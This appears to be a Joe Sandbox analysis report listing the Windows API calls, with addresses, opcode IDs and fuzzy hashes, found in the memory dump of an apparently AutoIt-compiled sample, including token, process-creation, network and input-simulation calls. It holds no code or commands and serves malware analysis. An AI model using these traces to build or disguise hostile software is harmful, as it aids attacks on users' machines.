                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                  • String ID:
                                                  • API String ID: 1101466143-0
                                                  • Opcode ID: 91795e50371d7720363fa8ed40f36d535c8245efc3b48d8d625d3d763bce3bf2
                                                  • Instruction ID: 91235ee4efd0a4b58d54cf20d3049e7b8e4dc0aa43ac2ed91eba9b83d1c2b294
                                                  • Opcode Fuzzy Hash: 91795e50371d7720363fa8ed40f36d535c8245efc3b48d8d625d3d763bce3bf2
                                                  • Instruction Fuzzy Hash: BB513CB5A00209DFDB14CF58C884AAAB7B8FF8C314B15856DE959DB301E735E952CFA0
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52258
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C522A3
                                                  • IsMenu.USER32(00000000), ref: 00C522C3
                                                  • CreatePopupMenu.USER32 ref: 00C522F7
                                                  • GetMenuItemCount.USER32(000000FF), ref: 00C52355
                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C52386
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                  • String ID:
                                                  • API String ID: 3311875123-0
                                                  • Opcode ID: f7ff628b6f9fa92d7db074e4285af0dc3f939c057d59b0ffaad04cd137aa883b
                                                  • Instruction ID: 6f50c7b00332233393e65e8a4a409f3210e3b7adfa3a9dea9e47d80b814f775d
                                                  • Opcode Fuzzy Hash: f7ff628b6f9fa92d7db074e4285af0dc3f939c057d59b0ffaad04cd137aa883b
                                                  • Instruction Fuzzy Hash: E451F338600209DFCF20CF68C888BADBBF8FF46316F144129EC65972A0D3748A88CB55
                                                  APIs
                                                    • Part of subcall function 00BF2612: GetWindowLongW.USER32(?,000000EB), ref: 00BF2623
                                                  • BeginPaint.USER32(?,?,?,?,?,?), ref: 00BF179A
                                                  • GetWindowRect.USER32(?,?), ref: 00BF17FE
                                                  • ScreenToClient.USER32(?,?), ref: 00BF181B
                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00BF182C
                                                  • EndPaint.USER32(?,?), ref: 00BF1876
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                  • String ID:
                                                  • API String ID: 1827037458-0
                                                  • Opcode ID: cd48d33d3c10a8e4d94baae332cff6d4d2f5b91391a1bc646aa6856014c5bbee
                                                  • Instruction ID: 635d6627ec6441383fdb951e03bb4f4e27f75a847da1d81f38b86093e0923ccb
                                                  • Opcode Fuzzy Hash: cd48d33d3c10a8e4d94baae332cff6d4d2f5b91391a1bc646aa6856014c5bbee
                                                  • Instruction Fuzzy Hash: E5419D70104204EFD711DF28DCC4BBA7BE8EB59724F044A68FAA8872E1C7319C49DB61
                                                  APIs
                                                  • ShowWindow.USER32(00CB57B0,00000000,015652E0,?,?,00CB57B0,?,00C7B5A8,?,?), ref: 00C7B712
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00C7B736
                                                  • ShowWindow.USER32(00CB57B0,00000000,015652E0,?,?,00CB57B0,?,00C7B5A8,?,?), ref: 00C7B796
                                                  • ShowWindow.USER32(00000000,00000004,?,00C7B5A8,?,?), ref: 00C7B7A8
                                                  • EnableWindow.USER32(00000000,00000001), ref: 00C7B7CC
                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00C7B7EF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Show$Enable$MessageSend
                                                  • String ID:
                                                  • API String ID: 642888154-0
                                                  • Opcode ID: 6dbb7701ca10aa61cb3868ad4f9b176156f1892523216fdaa29f54bdc02d6cbb
                                                  • Instruction ID: a5b337277c75636e62495695447f877140da885bc22990b5226e310abae39be7
                                                  • Opcode Fuzzy Hash: 6dbb7701ca10aa61cb3868ad4f9b176156f1892523216fdaa29f54bdc02d6cbb
                                                  • Instruction Fuzzy Hash: 50417434600244AFDB2ACF24C49AB947BE1FF45314F1881B9F95C8F6A2C731AD96CB61
                                                  APIs
                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00C64E41,?,?,00000000,00000001), ref: 00C670AC
                                                    • Part of subcall function 00C639A0: GetWindowRect.USER32(?,?), ref: 00C639B3
                                                  • GetDesktopWindow.USER32 ref: 00C670D6
                                                  • GetWindowRect.USER32(00000000), ref: 00C670DD
                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C6710F
                                                    • Part of subcall function 00C55244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00C552BC
                                                  • GetCursorPos.USER32(?), ref: 00C6713B
                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C67199
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                  • String ID:
                                                  • API String ID: 4137160315-0
                                                  • Opcode ID: f14a2b5dc69b7e5486b6d8e65af848e3a97c14f01023efebc059846714f857f9
                                                  • Instruction ID: 48514fc0ffcec33a1bea64738bd191bef8d2753243ae1569ad9d47f91142a54d
                                                  • Opcode Fuzzy Hash: f14a2b5dc69b7e5486b6d8e65af848e3a97c14f01023efebc059846714f857f9
                                                  • Instruction Fuzzy Hash: A831B272509305ABD720DF14CC89B9FBBA9FF89314F000A1EF59997191D670EA49CB92
                                                  APIs
                                                    • Part of subcall function 00C480A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C480C0
                                                    • Part of subcall function 00C480A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C480CA
                                                    • Part of subcall function 00C480A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C480D9
                                                    • Part of subcall function 00C480A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C480E0
                                                    • Part of subcall function 00C480A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C480F6
                                                  • GetLengthSid.ADVAPI32(?,00000000,00C4842F), ref: 00C488CA
                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00C488D6
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00C488DD
                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00C488F6
                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00C4842F), ref: 00C4890A
                                                  • HeapFree.KERNEL32(00000000), ref: 00C48911
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                  • String ID:
                                                  • API String ID: 3008561057-0
                                                  • Opcode ID: 7a22284ca554a80f5bda38346f3d956f5b84d9b739edcc23900a091ef1bee2cb
                                                  • Instruction ID: 0d3d0e41e8ef071e8d68fadee60b97bf03ed18a54befb8cead5a80bcdf2397d5
                                                  • Opcode Fuzzy Hash: 7a22284ca554a80f5bda38346f3d956f5b84d9b739edcc23900a091ef1bee2cb
                                                  • Instruction Fuzzy Hash: 6A11BE31601609FFDB159FA4DC4ABBE7BB8FB45311F50802DE89997210CB329E49DB60
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C485E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C485E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C485F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C48603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C48632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C48646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: f62b2d4f233ab27f2fd9ec635a6d0f19193cd0bbdd5da5168e7da36cbd603d82
                                                  • Instruction ID: 809859cc007344bceaa2b46b3f20cf2b433e3dd92cad64e98eb12bfb120d4cba
                                                  • Opcode Fuzzy Hash: f62b2d4f233ab27f2fd9ec635a6d0f19193cd0bbdd5da5168e7da36cbd603d82
                                                  • Instruction Fuzzy Hash: 8A113D7250124DABEF028FA4ED89FEE7BA9FF48344F044069FE05A2161C7719E65DB60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00C4B7B5
                                                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C4B7C6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4B7CD
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00C4B7D5
                                                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C4B7EC
                                                  • MulDiv.KERNEL32(000009EC,?,?), ref: 00C4B7FE
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CapsDevice$Release
                                                  • String ID:
                                                  • API String ID: 1035833867-0
                                                  APIs
                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10193
                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1019B
                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C101A6
                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C101B1
                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C101B9
                                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C101C1
                                                  Similarity
                                                  • API ID: Virtual
                                                  • String ID:
                                                  • API String ID: 4278518827-0
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C553F9
                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00C5540F
                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00C5541E
                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5542D
                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C55437
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C5543E
                                                  Similarity
                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                  • String ID:
                                                  • API String ID: 839392675-0
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00C57243
                                                  • EnterCriticalSection.KERNEL32(?,?,00C00EE4,?,?), ref: 00C57254
                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00C00EE4,?,?), ref: 00C57261
                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C00EE4,?,?), ref: 00C5726E
                                                    • Part of subcall function 00C56C35: CloseHandle.KERNEL32(00000000,?,00C5727B,?,00C00EE4,?,?), ref: 00C56C3F
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00C57281
                                                  • LeaveCriticalSection.KERNEL32(?,?,00C00EE4,?,?), ref: 00C57288
                                                  Similarity
                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                  • String ID:
                                                  • API String ID: 3495660284-0
                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C4899D
                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C489A9
                                                  • CloseHandle.KERNEL32(?), ref: 00C489B2
                                                  • CloseHandle.KERNEL32(?), ref: 00C489BA
                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C489C3
                                                  • HeapFree.KERNEL32(00000000), ref: 00C489CA
                                                  Similarity
                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                  • String ID:
                                                  • API String ID: 146765662-0
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C68613
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C68722
                                                  • VariantClear.OLEAUT32(?), ref: 00C6889A
                                                    • Part of subcall function 00C57562: VariantInit.OLEAUT32(00000000), ref: 00C575A2
                                                    • Part of subcall function 00C57562: VariantCopy.OLEAUT32(00000000,?), ref: 00C575AB
                                                    • Part of subcall function 00C57562: VariantClear.OLEAUT32(00000000), ref: 00C575B7
                                                  Strings
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  APIs
                                                    • Part of subcall function 00C0FC86: _wcscpy.LIBCMT ref: 00C0FCA9
                                                  • _memset.LIBCMT ref: 00C52B87
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C52BB6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C52C69
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C52C97
                                                  Strings
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4D5D4
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C4D60A
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C4D61B
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C4D69D
                                                  Strings
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C527C0
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C527DC
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00C52822
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CB5890,00000000), ref: 00C5286B
                                                  Strings
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6D7C5
                                                    • Part of subcall function 00BF784B: _memmove.LIBCMT ref: 00BF7899
                                                  Strings
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C48F14
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C48F27
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C48F57
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Strings
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6184C
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C61872
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C618A2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C618E9
                                                    • Part of subcall function 00C62483: GetLastError.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C62498
                                                    • Part of subcall function 00C62483: SetEvent.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C624AD
                                                  Strings
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: a201b604811e742bd65f75876f8e5110ed91ce0aea22b9f47a1873d13d9c3f3e
                                                  • Instruction ID: 8bb5437a4882d174a41e952f0252767bbe0937efe6292109aefaec5183df9b27
                                                  • Opcode Fuzzy Hash: a201b604811e742bd65f75876f8e5110ed91ce0aea22b9f47a1873d13d9c3f3e
                                                  • Instruction Fuzzy Hash: 5921B0B1500208BFEB219B65DCC5FBF77EDEB48746F18412AF80597180DA248E0567A1
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C76461
                                                  • LoadLibraryW.KERNEL32(?), ref: 00C76468
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C7647D
                                                  • DestroyWindow.USER32(?), ref: 00C76485
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 39a142be4a161797d4393684b258903569fc0e45f412d1a99221e1a42a86502e
                                                  • Instruction ID: f5f85bad22b05af914d7c82d3d4b42cf45be104643229adfeee58d4787b4d7e1
                                                  • Opcode Fuzzy Hash: 39a142be4a161797d4393684b258903569fc0e45f412d1a99221e1a42a86502e
                                                  • Instruction Fuzzy Hash: 4C218E71200A05AFEF108F65DC80FBA37A9EB59364F108629FA28921A0D771DC91A760
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C56DBC
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C56DEF
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C56E01
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C56E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 2586a25b65cc874c95fb4ecc587b21577292b2b0f8f02b190372e200f42f38ba
                                                  • Instruction ID: 4b0fba00c68f6193aaf6282f3934fbd710057fdcedae75dee7c753ffc63896cc
                                                  • Opcode Fuzzy Hash: 2586a25b65cc874c95fb4ecc587b21577292b2b0f8f02b190372e200f42f38ba
                                                  • Instruction Fuzzy Hash: BF21B278600209ABDB209F29DC45B9E77F4EF54722F604A29FCB0D72D0D7709999CB58
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C56E89
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C56EBB
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C56ECC
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C56F06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 52e1210ebc270c14e4edbf03493259f6b892d31d1f042948ec96eb28e6a2aaba
                                                  • Instruction ID: fc9613f1042c222af1ab69791cb9ebd1800bc37b7951a58137192c9ffda85cc8
                                                  • Opcode Fuzzy Hash: 52e1210ebc270c14e4edbf03493259f6b892d31d1f042948ec96eb28e6a2aaba
                                                  • Instruction Fuzzy Hash: F821C47D5013059BDB209F69CC45BAA77A8EF45721F600A19FCB1D32D0D7B0A9D9C718
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5AC54
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C5ACA8
                                                  • __swprintf.LIBCMT ref: 00C5ACC1
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C7F910), ref: 00C5ACFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 0500aba16983b329f061314e86f62084f35e243df621315948dd85736a7df6d3
                                                  • Instruction ID: c0af78ef8ac0a0734753b187a92caf64d20b51467fc92a0724a0c66b6bb390fc
                                                  • Opcode Fuzzy Hash: 0500aba16983b329f061314e86f62084f35e243df621315948dd85736a7df6d3
                                                  • Instruction Fuzzy Hash: 8A217F35A00109AFCB10EF65DD85EAE7BB8FF49314B0040A9F909EB252DA71EA45DB21
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C51B19
                                                  Strings
                                                  Memory Dump Source
